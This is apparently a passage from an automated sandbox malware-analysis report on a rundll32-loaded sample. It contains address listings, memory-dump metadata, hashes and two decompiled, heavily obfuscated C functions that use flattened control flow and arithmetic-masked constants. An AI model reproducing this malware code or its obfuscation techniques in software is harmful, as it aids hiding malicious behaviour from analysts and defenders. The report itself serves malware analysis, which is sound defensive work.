                                                                                                                      0x00181385
                                                                                                                      0x0018138d
                                                                                                                      0x00181395
                                                                                                                      0x0018139d
                                                                                                                      0x001813a5
                                                                                                                      0x001813ad
                                                                                                                      0x001813b2
                                                                                                                      0x001813ba
                                                                                                                      0x001813c2
                                                                                                                      0x001813ca
                                                                                                                      0x001813d2
                                                                                                                      0x001813da
                                                                                                                      0x001813e2
                                                                                                                      0x001813ea
                                                                                                                      0x001813f2
                                                                                                                      0x001813fa
                                                                                                                      0x00181402
                                                                                                                      0x0018140f
                                                                                                                      0x00181413
                                                                                                                      0x00181418
                                                                                                                      0x00181420
                                                                                                                      0x00181428
                                                                                                                      0x00181430
                                                                                                                      0x00181438
                                                                                                                      0x00181440
                                                                                                                      0x00181448
                                                                                                                      0x00181450
                                                                                                                      0x00181458
                                                                                                                      0x00181460
                                                                                                                      0x00181468
                                                                                                                      0x00181470
                                                                                                                      0x00181475
                                                                                                                      0x0018147f
                                                                                                                      0x0018148c
                                                                                                                      0x0018149a
                                                                                                                      0x0018149f
                                                                                                                      0x001814a5
                                                                                                                      0x001814aa
                                                                                                                      0x001814af
                                                                                                                      0x001814b7
                                                                                                                      0x001814bf
                                                                                                                      0x001814c7
                                                                                                                      0x001814d0
                                                                                                                      0x001814d5
                                                                                                                      0x001814db
                                                                                                                      0x001814e3
                                                                                                                      0x001814eb
                                                                                                                      0x001814f0
                                                                                                                      0x001814f8
                                                                                                                      0x00181500
                                                                                                                      0x00181508
                                                                                                                      0x00181511
                                                                                                                      0x00181516
                                                                                                                      0x0018151c
                                                                                                                      0x00181521
                                                                                                                      0x00181529
                                                                                                                      0x00181531
                                                                                                                      0x00181539
                                                                                                                      0x00181541
                                                                                                                      0x00181549
                                                                                                                      0x0018154e
                                                                                                                      0x00181556
                                                                                                                      0x00181562
                                                                                                                      0x0018156a
                                                                                                                      0x0018156e
                                                                                                                      0x00181576
                                                                                                                      0x0018157e
                                                                                                                      0x00181583
                                                                                                                      0x0018158b
                                                                                                                      0x00181593
                                                                                                                      0x0018159b
                                                                                                                      0x001815a3
                                                                                                                      0x001815a3
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ab
                                                                                                                      0x001815ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001815b3
                                                                                                                      0x0018176b
                                                                                                                      0x001815b9
                                                                                                                      0x001815bf
                                                                                                                      0x00181666
                                                                                                                      0x0018166b
                                                                                                                      0x0018166e
                                                                                                                      0x00000000
                                                                                                                      0x001815c5
                                                                                                                      0x001815cb
                                                                                                                      0x00181647
                                                                                                                      0x0018164c
                                                                                                                      0x0018164f
                                                                                                                      0x00000000
                                                                                                                      0x001815cd
                                                                                                                      0x001815d3
                                                                                                                      0x00181631
                                                                                                                      0x00181636
                                                                                                                      0x00181639
                                                                                                                      0x00000000
                                                                                                                      0x001815d5
                                                                                                                      0x001815db
                                                                                                                      0x00181616
                                                                                                                      0x0018161b
                                                                                                                      0x0018161e
                                                                                                                      0x00000000
                                                                                                                      0x001815dd
                                                                                                                      0x001815e3
                                                                                                                      0x00000000
                                                                                                                      0x001815e9
                                                                                                                      0x001815f8
                                                                                                                      0x001815fd
                                                                                                                      0x00181600
                                                                                                                      0x00000000
                                                                                                                      0x00181600
                                                                                                                      0x001815e3
                                                                                                                      0x001815db
                                                                                                                      0x001815d3
                                                                                                                      0x001815cb
                                                                                                                      0x001815bf
                                                                                                                      0x00181774
                                                                                                                      0x00181776
                                                                                                                      0x0018177a
                                                                                                                      0x0018177a
                                                                                                                      0x00181784
                                                                                                                      0x00181784
                                                                                                                      0x00181678
                                                                                                                      0x0018167e
                                                                                                                      0x0018173d
                                                                                                                      0x00181742
                                                                                                                      0x00181745
                                                                                                                      0x00000000
                                                                                                                      0x00181684
                                                                                                                      0x00181684
                                                                                                                      0x0018168a
                                                                                                                      0x0018171c
                                                                                                                      0x00181721
                                                                                                                      0x00181724
                                                                                                                      0x00000000
                                                                                                                      0x0018168c
                                                                                                                      0x0018168c
                                                                                                                      0x00181692
                                                                                                                      0x001816fc
                                                                                                                      0x001816ff
                                                                                                                      0x00000000
                                                                                                                      0x00181694
                                                                                                                      0x00181694
                                                                                                                      0x00181696
                                                                                                                      0x001816e3
                                                                                                                      0x001816e8
                                                                                                                      0x001816eb
                                                                                                                      0x00000000
                                                                                                                      0x00181698
                                                                                                                      0x00181698
                                                                                                                      0x0018169e
                                                                                                                      0x00000000
                                                                                                                      0x001816a4
                                                                                                                      0x001816b0
                                                                                                                      0x001816b1
                                                                                                                      0x001816b5
                                                                                                                      0x001816ba
                                                                                                                      0x001816be
                                                                                                                      0x001816c0
                                                                                                                      0x001816c6
                                                                                                                      0x00000000
                                                                                                                      0x001816c6
                                                                                                                      0x001816c0
                                                                                                                      0x0018169e
                                                                                                                      0x00181696
                                                                                                                      0x00181692
                                                                                                                      0x0018168a
                                                                                                                      0x00000000
                                                                                                                      0x0018174a
                                                                                                                      0x0018174a
                                                                                                                      0x0018174a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: d3cf39b6bcd7fac94604d7c0dfadea08961fd86b09fed1bfdbc3910bd42b54bc
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: DEC143725087419FC768DF64C88941FBBE2FBD5718F144A1DF68686260D3B58A49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018363D Relevance: 7.8, Strings: 6, Instructions: 259COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E0018363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t264;
				signed int _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				void* _t307;
				void* _t308;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a28);
				_t334 = __ecx;
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t264 = E0017CF25(0);
				_v72 = _t264;
				_t335 = _t264;
				_v124 = 0xc44be;
				_t338 =  &(( &_v176)[9]);
				_v124 = _v124 + 0xffff24c4;
				_t307 = 0xc36eaf9;
				_t298 = 0x37;
				_v124 = _v124 * 0x2e;
				_v124 = _v124 ^ 0x020cf15c;
				_v176 = 0xedca77;
				_v176 = _v176 * 0x1f;
				_v176 = _v176 << 4;
				_v176 = _v176 + 0xdbf9;
				_v176 = _v176 ^ 0xccb922a9;
				_v120 = 0x5a606;
				_v120 = _v120 | 0xc9e49228;
				_t299 = 0x62;
				_v120 = _v120 / _t298;
				_v120 = _v120 ^ 0x03ad0d8c;
				_v144 = 0x918442;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x3e;
				_v144 = _v144 + 0xa3d5;
				_v144 = _v144 ^ 0x0007140c;
				_v88 = 0x37923f;
				_v88 = _v88 ^ 0x32449291;
				_v88 = _v88 ^ 0x3276c44e;
				_v168 = 0xa5175f;
				_v168 = _v168 + 0x6cd0;
				_v168 = _v168 >> 0xd;
				_v168 = _v168 + 0x50d;
				_v168 = _v168 ^ 0x000b28ed;
				_v96 = 0x8bb9e8;
				_v96 = _v96 ^ 0x9313002a;
				_v96 = _v96 ^ 0x93929827;
				_v128 = 0x9b97bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 + 0x506c;
				_v128 = _v128 ^ 0x0008f405;
				_v136 = 0x162b;
				_v136 = _v136 << 0xe;
				_v136 = _v136 ^ 0xcbe41246;
				_v136 = _v136 ^ 0xce6e1682;
				_v160 = 0xb72d70;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x815bd7a2;
				_v160 = _v160 ^ 0x177336f3;
				_v160 = _v160 ^ 0x962c98d3;
				_v100 = 0xe545e5;
				_v100 = _v100 + 0xffffaae8;
				_v100 = _v100 | 0x514a639c;
				_v100 = _v100 ^ 0x51eea269;
				_v152 = 0xd9d32c;
				_v152 = _v152 >> 8;
				_v152 = _v152 ^ 0x78b07b8d;
				_v152 = _v152 / _t299;
				_v152 = _v152 ^ 0x01343475;
				_v92 = 0x6219a9;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x6210c938;
				_v80 = 0x3ff2a1;
				_v80 = _v80 + 0xffff7ea3;
				_v80 = _v80 ^ 0x003f2f73;
				_v164 = 0xe5565b;
				_v164 = _v164 + 0xffff5b62;
				_t300 = 0x78;
				_v164 = _v164 * 6;
				_v164 = _v164 / _t300;
				_v164 = _v164 ^ 0x000727eb;
				_v76 = 0x250d2;
				_v76 = _v76 | 0x8f851c12;
				_v76 = _v76 ^ 0x8f8220e2;
				_v116 = 0x568e;
				_v116 = _v116 ^ 0x3d61f204;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0xb0d54eba;
				_v172 = 0xa5a4a3;
				_v172 = _v172 | 0xd2f7b266;
				_v172 = _v172 >> 0xd;
				_t301 = 0x7f;
				_v172 = _v172 * 0x30;
				_v172 = _v172 ^ 0x0132b547;
				_v112 = 0xd0329d;
				_v112 = _v112 * 0x58;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0x3c81866c;
				_v104 = 0x844e69;
				_v104 = _v104 << 0xc;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0443b556;
				_v84 = 0x1d6374;
				_v84 = _v84 >> 0xd;
				_v84 = _v84 ^ 0x000df0de;
				_v148 = 0x6585fd;
				_v148 = _v148 / _t301;
				_t302 = 0x77;
				_v148 = _v148 / _t302;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 ^ 0x000a9d1a;
				_v156 = 0xff5a31;
				_v156 = _v156 + 0xce45;
				_t303 = 0x29;
				_v156 = _v156 / _t303;
				_v156 = _v156 << 1;
				_v156 = _v156 ^ 0x0008392b;
				_v132 = 0x13d5b5;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xffff95f7;
				_v132 = _v132 ^ 0xd5b1b27f;
				_v108 = 0x3556bb;
				_v108 = _v108 * 0x4f;
				_v108 = _v108 + 0xffff90f3;
				_v108 = _v108 ^ 0x10791788;
				_v140 = 0x81de0d;
				_t304 = 0x6d;
				_v140 = _v140 / _t304;
				_v140 = _v140 + 0xf4b;
				_v140 = _v140 * 0x26;
				_v140 = _v140 ^ 0x002a9917;
				do {
					while(_t307 != 0x688d2d5) {
						if(_t307 == 0x8a4f536) {
							_t295 = E00185B0E(_a28, _v120,  &_v72, _v144);
							_t338 =  &(_t338[3]);
							__eflags = _t295;
							if(_t295 != 0) {
								_t307 = 0x688d2d5;
								continue;
							}
						} else {
							if(_t307 == 0x94a3104) {
								E00176E34(_v132, _v72, _v108, _v140);
							} else {
								if(_t307 != 0xc36eaf9) {
									goto L9;
								} else {
									_t307 = 0x8a4f536;
									continue;
								}
							}
						}
						L12:
						return _t335;
					}
					_push(_v128);
					_push(_v96);
					_push(_v168);
					_push(_v88);
					_t308 = 0x44;
					E00191310(_t308,  &_v68);
					_push(_v152);
					_v68 = 0x44;
					_push(_v100);
					_t309 = _v136;
					_push(0x171800);
					_v60 = E0017AB66(_v136, _v160, __eflags);
					__eflags = _v176 | _v124;
					_t335 = E0018C8BD(_v92, _v136, _v80, _v136, _t309, _v164, _v76, _a20, _v116, _t334, _a28, _v172, _v176 | _v124, 0, _v112,  &_v68, _v72, _v104);
					E0017AE03(_v84, _v148, _v156, _v60);
					_t338 =  &(_t338[0x1a]);
					_t307 = 0x94a3104;
					L9:
					__eflags = _t307 - 0xce6287b;
				} while (_t307 != 0xce6287b);
				goto L12;
			}














































                                                                                                                      0x00183647
                                                                                                                      0x00183650
                                                                                                                      0x00183652
                                                                                                                      0x00183653
                                                                                                                      0x0018365a
                                                                                                                      0x00183661
                                                                                                                      0x00183668
                                                                                                                      0x0018366f
                                                                                                                      0x00183676
                                                                                                                      0x00183677
                                                                                                                      0x00183678
                                                                                                                      0x0018367d
                                                                                                                      0x00183684
                                                                                                                      0x00183686
                                                                                                                      0x0018368e
                                                                                                                      0x00183691
                                                                                                                      0x001836a0
                                                                                                                      0x001836a7
                                                                                                                      0x001836aa
                                                                                                                      0x001836ae
                                                                                                                      0x001836b6
                                                                                                                      0x001836c3
                                                                                                                      0x001836c7
                                                                                                                      0x001836cc
                                                                                                                      0x001836d4
                                                                                                                      0x001836dc
                                                                                                                      0x001836e4
                                                                                                                      0x001836f2
                                                                                                                      0x001836f3
                                                                                                                      0x001836f7
                                                                                                                      0x001836ff
                                                                                                                      0x00183707
                                                                                                                      0x00183711
                                                                                                                      0x00183715
                                                                                                                      0x0018371d
                                                                                                                      0x00183725
                                                                                                                      0x0018372d
                                                                                                                      0x00183735
                                                                                                                      0x0018373d
                                                                                                                      0x00183745
                                                                                                                      0x0018374d
                                                                                                                      0x00183752
                                                                                                                      0x0018375a
                                                                                                                      0x00183762
                                                                                                                      0x0018376a
                                                                                                                      0x00183772
                                                                                                                      0x0018377a
                                                                                                                      0x00183782
                                                                                                                      0x00183787
                                                                                                                      0x0018378f
                                                                                                                      0x00183797
                                                                                                                      0x0018379f
                                                                                                                      0x001837a4
                                                                                                                      0x001837ac
                                                                                                                      0x001837b4
                                                                                                                      0x001837bc
                                                                                                                      0x001837c1
                                                                                                                      0x001837c9
                                                                                                                      0x001837d1
                                                                                                                      0x001837d9
                                                                                                                      0x001837e1
                                                                                                                      0x001837e9
                                                                                                                      0x001837f1
                                                                                                                      0x001837f9
                                                                                                                      0x00183801
                                                                                                                      0x00183806
                                                                                                                      0x00183818
                                                                                                                      0x0018381e
                                                                                                                      0x00183826
                                                                                                                      0x0018382e
                                                                                                                      0x00183833
                                                                                                                      0x0018383b
                                                                                                                      0x00183843
                                                                                                                      0x0018384b
                                                                                                                      0x00183853
                                                                                                                      0x0018385b
                                                                                                                      0x00183868
                                                                                                                      0x0018386b
                                                                                                                      0x00183877
                                                                                                                      0x0018387b
                                                                                                                      0x00183883
                                                                                                                      0x0018388b
                                                                                                                      0x00183893
                                                                                                                      0x0018389b
                                                                                                                      0x001838a3
                                                                                                                      0x001838ab
                                                                                                                      0x001838b0
                                                                                                                      0x001838b8
                                                                                                                      0x001838c0
                                                                                                                      0x001838c8
                                                                                                                      0x001838d2
                                                                                                                      0x001838d5
                                                                                                                      0x001838d9
                                                                                                                      0x001838e1
                                                                                                                      0x001838ee
                                                                                                                      0x001838f2
                                                                                                                      0x001838f7
                                                                                                                      0x001838ff
                                                                                                                      0x00183907
                                                                                                                      0x0018390c
                                                                                                                      0x00183911
                                                                                                                      0x00183919
                                                                                                                      0x00183921
                                                                                                                      0x00183926
                                                                                                                      0x0018392e
                                                                                                                      0x0018393e
                                                                                                                      0x00183946
                                                                                                                      0x0018394b
                                                                                                                      0x00183951
                                                                                                                      0x00183956
                                                                                                                      0x0018395e
                                                                                                                      0x00183966
                                                                                                                      0x00183972
                                                                                                                      0x00183975
                                                                                                                      0x00183979
                                                                                                                      0x0018397d
                                                                                                                      0x00183985
                                                                                                                      0x0018398d
                                                                                                                      0x00183992
                                                                                                                      0x0018399a
                                                                                                                      0x001839a2
                                                                                                                      0x001839af
                                                                                                                      0x001839b3
                                                                                                                      0x001839bb
                                                                                                                      0x001839c3
                                                                                                                      0x001839d8
                                                                                                                      0x001839e0
                                                                                                                      0x001839e4
                                                                                                                      0x001839f1
                                                                                                                      0x001839f5
                                                                                                                      0x001839fd
                                                                                                                      0x001839fd
                                                                                                                      0x00183a03
                                                                                                                      0x00183a35
                                                                                                                      0x00183a3a
                                                                                                                      0x00183a3d
                                                                                                                      0x00183a3f
                                                                                                                      0x00183a45
                                                                                                                      0x00000000
                                                                                                                      0x00183a45
                                                                                                                      0x00183a05
                                                                                                                      0x00183a0b
                                                                                                                      0x00183b31
                                                                                                                      0x00183a11
                                                                                                                      0x00183a17
                                                                                                                      0x00000000
                                                                                                                      0x00183a1d
                                                                                                                      0x00183a1d
                                                                                                                      0x00000000
                                                                                                                      0x00183a1d
                                                                                                                      0x00183a17
                                                                                                                      0x00183a0b
                                                                                                                      0x00183b39
                                                                                                                      0x00183b44
                                                                                                                      0x00183b44
                                                                                                                      0x00183a49
                                                                                                                      0x00183a54
                                                                                                                      0x00183a58
                                                                                                                      0x00183a5c
                                                                                                                      0x00183a62
                                                                                                                      0x00183a63
                                                                                                                      0x00183a68
                                                                                                                      0x00183a6c
                                                                                                                      0x00183a77
                                                                                                                      0x00183a7f
                                                                                                                      0x00183a83
                                                                                                                      0x00183a90
                                                                                                                      0x00183aac
                                                                                                                      0x00183af2
                                                                                                                      0x00183b03
                                                                                                                      0x00183b08
                                                                                                                      0x00183b0b
                                                                                                                      0x00183b10
                                                                                                                      0x00183b10
                                                                                                                      0x00183b10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: 4110c5fb5a22a2dd88b0446ca4237de5dede076b2eb902c849a41d2ab06dadb1
                                                                                                                      • Instruction ID: eb9896144b2c8420fe777e414bcd6f4142039eec8a23f85e40344cc8d5601d95
                                                                                                                      • Opcode Fuzzy Hash: 4110c5fb5a22a2dd88b0446ca4237de5dede076b2eb902c849a41d2ab06dadb1
                                                                                                                      • Instruction Fuzzy Hash: E7C11F715083809FD368CF64C98AA1BFBE1FBD8748F509A1DF69596260C7B58A48CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001788F4 Relevance: 7.7, Strings: 6, Instructions: 235COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E001788F4(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _t258;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t303;
				void* _t304;
				signed int* _t307;

				_t307 =  &_v1668;
				_v1644 = 0x34739e;
				_v1644 = _v1644 * 0x43;
				_t303 = __ecx;
				_v1644 = _v1644 >> 0xb;
				_t304 = 0x422d362;
				_t271 = 0x7d;
				_v1644 = _v1644 / _t271;
				_v1644 = _v1644 ^ 0x00084d9c;
				_v1612 = 0xb20ebf;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x83a04dde;
				_v1580 = 0xaa66ba;
				_v1580 = _v1580 + 0xffff0111;
				_v1580 = _v1580 ^ 0x00ac31ef;
				_v1604 = 0x4a91ac;
				_v1604 = _v1604 | 0x86032005;
				_v1604 = _v1604 ^ 0x86453654;
				_v1660 = 0x3cdcbf;
				_t272 = 0x34;
				_v1660 = _v1660 / _t272;
				_v1660 = _v1660 << 9;
				_t273 = 0x19;
				_v1660 = _v1660 * 0x33;
				_v1660 = _v1660 ^ 0x776ddfce;
				_v1620 = 0xfdfe87;
				_v1620 = _v1620 | 0x8debc5e9;
				_v1620 = _v1620 ^ 0x8df4241a;
				_v1596 = 0xc5e4de;
				_v1596 = _v1596 / _t273;
				_v1596 = _v1596 ^ 0x000ab9e2;
				_v1568 = 0x4c47da;
				_v1568 = _v1568 + 0x5d3c;
				_v1568 = _v1568 ^ 0x0043a9f3;
				_v1564 = 0xed5f6a;
				_t274 = 0x2a;
				_v1564 = _v1564 / _t274;
				_v1564 = _v1564 ^ 0x00049b09;
				_v1588 = 0xe27f75;
				_t275 = 0x68;
				_v1588 = _v1588 * 0x15;
				_v1588 = _v1588 ^ 0x129f57f0;
				_v1572 = 0x58913e;
				_v1572 = _v1572 + 0xffff0520;
				_v1572 = _v1572 ^ 0x005b93ab;
				_v1648 = 0xac4e73;
				_v1648 = _v1648 >> 8;
				_v1648 = _v1648 >> 0x10;
				_v1648 = _v1648 << 3;
				_v1648 = _v1648 ^ 0x000ac3bf;
				_v1668 = 0x5a6a4e;
				_t90 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t90 * 0x58;
				_t92 =  &_v1668; // 0x5a6a4e
				_v1668 =  *_t92 / _t275;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 ^ 0x009738dd;
				_v1640 = 0x7a6607;
				_t276 = 0x65;
				_v1640 = _v1640 * 0xa;
				_v1640 = _v1640 >> 9;
				_v1640 = _v1640 | 0xf246f931;
				_v1640 = _v1640 ^ 0xf242cc5d;
				_v1628 = 0xa390c8;
				_v1628 = _v1628 << 0xf;
				_v1628 = _v1628 ^ 0x3ac7d651;
				_v1628 = _v1628 ^ 0xf2afedad;
				_v1652 = 0x2d980b;
				_v1652 = _v1652 * 0x71;
				_v1652 = _v1652 * 0x17;
				_v1652 = _v1652 ^ 0x28f4da4d;
				_v1652 = _v1652 ^ 0xe6141d35;
				_v1636 = 0x37785c;
				_v1636 = _v1636 + 0xffffcffd;
				_v1636 = _v1636 ^ 0x6b7d5c73;
				_v1636 = _v1636 ^ 0x6b457d84;
				_v1616 = 0xb1620;
				_v1616 = _v1616 << 0x10;
				_v1616 = _v1616 ^ 0x162b8e46;
				_v1632 = 0x4c47;
				_v1632 = _v1632 + 0xffffc0f0;
				_v1632 = _v1632 + 0xffffd3bf;
				_v1632 = _v1632 ^ 0xfff44e1b;
				_v1664 = 0xa6b80c;
				_v1664 = _v1664 + 0xf763;
				_v1664 = _v1664 * 0x6e;
				_v1664 = _v1664 / _t276;
				_v1664 = _v1664 ^ 0x00b9c638;
				_v1600 = 0xaa0054;
				_v1600 = _v1600 ^ 0xf2e3595a;
				_v1600 = _v1600 ^ 0xf24e3ce3;
				_v1608 = 0x669547;
				_v1608 = _v1608 + 0xe3ee;
				_v1608 = _v1608 ^ 0x0066aeed;
				_v1656 = 0xf50b8d;
				_v1656 = _v1656 + 0xffffe5b9;
				_v1656 = _v1656 * 0x19;
				_v1656 = _v1656 * 0x2c;
				_v1656 = _v1656 ^ 0x1c789090;
				_v1576 = 0xf13773;
				_v1576 = _v1576 | 0xffe45fc0;
				_v1576 = _v1576 ^ 0xfffeb9af;
				_v1624 = 0xc714fc;
				_v1624 = _v1624 << 7;
				_v1624 = _v1624 * 0x4d;
				_v1624 = _v1624 ^ 0xf0acb0c0;
				_v1584 = 0x43b9ac;
				_v1584 = _v1584 + 0xfffff1bc;
				_v1584 = _v1584 ^ 0x004aa621;
				_v1592 = 0x5bf493;
				_t258 = _v1592 * 0x43;
				_v1592 = _t258;
				_v1592 = _v1592 ^ 0x181e9f62;
				while(_t304 != 0x2953b22) {
					if(_t304 == 0x422d362) {
						_t304 = 0xe704baa;
						continue;
					} else {
						_t312 = _t304 - 0xe704baa;
						if(_t304 != 0xe704baa) {
							L8:
							__eflags = _t304 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E001912A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
							 *((short*)(E00184FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
							E00178650(_v1596,  &_v520, _t312, _v1568);
							_push(_v1648);
							_push(_v1572);
							_push(0x17183c);
							E0017E7CE(E0017AB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
							E0017AE03(_v1616, _v1632, _v1664, _t264);
							_t276 = _v1600;
							_t258 = E0018C38F(_t276,  &_v1040, _t303, _v1608);
							_t307 =  &(_t307[0x15]);
							if(_t258 != 0) {
								_t304 = 0x2953b22;
								continue;
							}
						}
					}
					return _t258;
				}
				_push(_v1592);
				_push(_v1584);
				_push(_v1624);
				_push( &_v1040);
				_push(0);
				_push(_v1576);
				_push(_t276);
				_push(0);
				_t276 = 0;
				__eflags = 0;
				_t258 = E00179700(0, _v1656, 0);
				_t307 =  &(_t307[8]);
				_t304 = 0x740d40c;
				goto L8;
			}











































                                                                                                                      0x001788f4
                                                                                                                      0x001788fa
                                                                                                                      0x0017890d
                                                                                                                      0x00178911
                                                                                                                      0x00178913
                                                                                                                      0x00178918
                                                                                                                      0x00178923
                                                                                                                      0x00178928
                                                                                                                      0x0017892e
                                                                                                                      0x00178936
                                                                                                                      0x0017893e
                                                                                                                      0x00178943
                                                                                                                      0x0017894b
                                                                                                                      0x00178953
                                                                                                                      0x0017895b
                                                                                                                      0x00178963
                                                                                                                      0x0017896b
                                                                                                                      0x00178973
                                                                                                                      0x0017897b
                                                                                                                      0x00178987
                                                                                                                      0x0017898c
                                                                                                                      0x00178992
                                                                                                                      0x0017899c
                                                                                                                      0x0017899f
                                                                                                                      0x001789a3
                                                                                                                      0x001789ab
                                                                                                                      0x001789b3
                                                                                                                      0x001789bb
                                                                                                                      0x001789c3
                                                                                                                      0x001789d3
                                                                                                                      0x001789d7
                                                                                                                      0x001789df
                                                                                                                      0x001789e7
                                                                                                                      0x001789ef
                                                                                                                      0x001789f7
                                                                                                                      0x00178a03
                                                                                                                      0x00178a08
                                                                                                                      0x00178a0e
                                                                                                                      0x00178a16
                                                                                                                      0x00178a23
                                                                                                                      0x00178a24
                                                                                                                      0x00178a28
                                                                                                                      0x00178a30
                                                                                                                      0x00178a38
                                                                                                                      0x00178a40
                                                                                                                      0x00178a48
                                                                                                                      0x00178a50
                                                                                                                      0x00178a55
                                                                                                                      0x00178a5a
                                                                                                                      0x00178a5f
                                                                                                                      0x00178a67
                                                                                                                      0x00178a6f
                                                                                                                      0x00178a74
                                                                                                                      0x00178a78
                                                                                                                      0x00178a7e
                                                                                                                      0x00178a82
                                                                                                                      0x00178a86
                                                                                                                      0x00178a90
                                                                                                                      0x00178aa9
                                                                                                                      0x00178aaa
                                                                                                                      0x00178aae
                                                                                                                      0x00178ab3
                                                                                                                      0x00178abb
                                                                                                                      0x00178ac3
                                                                                                                      0x00178acb
                                                                                                                      0x00178ad0
                                                                                                                      0x00178ad8
                                                                                                                      0x00178ae0
                                                                                                                      0x00178aed
                                                                                                                      0x00178af6
                                                                                                                      0x00178afa
                                                                                                                      0x00178b02
                                                                                                                      0x00178b0a
                                                                                                                      0x00178b12
                                                                                                                      0x00178b1a
                                                                                                                      0x00178b22
                                                                                                                      0x00178b2a
                                                                                                                      0x00178b32
                                                                                                                      0x00178b37
                                                                                                                      0x00178b3f
                                                                                                                      0x00178b47
                                                                                                                      0x00178b4f
                                                                                                                      0x00178b57
                                                                                                                      0x00178b5f
                                                                                                                      0x00178b67
                                                                                                                      0x00178b74
                                                                                                                      0x00178b7e
                                                                                                                      0x00178b82
                                                                                                                      0x00178b8a
                                                                                                                      0x00178b92
                                                                                                                      0x00178b9a
                                                                                                                      0x00178ba2
                                                                                                                      0x00178baa
                                                                                                                      0x00178bb2
                                                                                                                      0x00178bba
                                                                                                                      0x00178bc2
                                                                                                                      0x00178bcf
                                                                                                                      0x00178bd8
                                                                                                                      0x00178bdc
                                                                                                                      0x00178be4
                                                                                                                      0x00178bec
                                                                                                                      0x00178bf4
                                                                                                                      0x00178bfc
                                                                                                                      0x00178c04
                                                                                                                      0x00178c0e
                                                                                                                      0x00178c12
                                                                                                                      0x00178c1a
                                                                                                                      0x00178c22
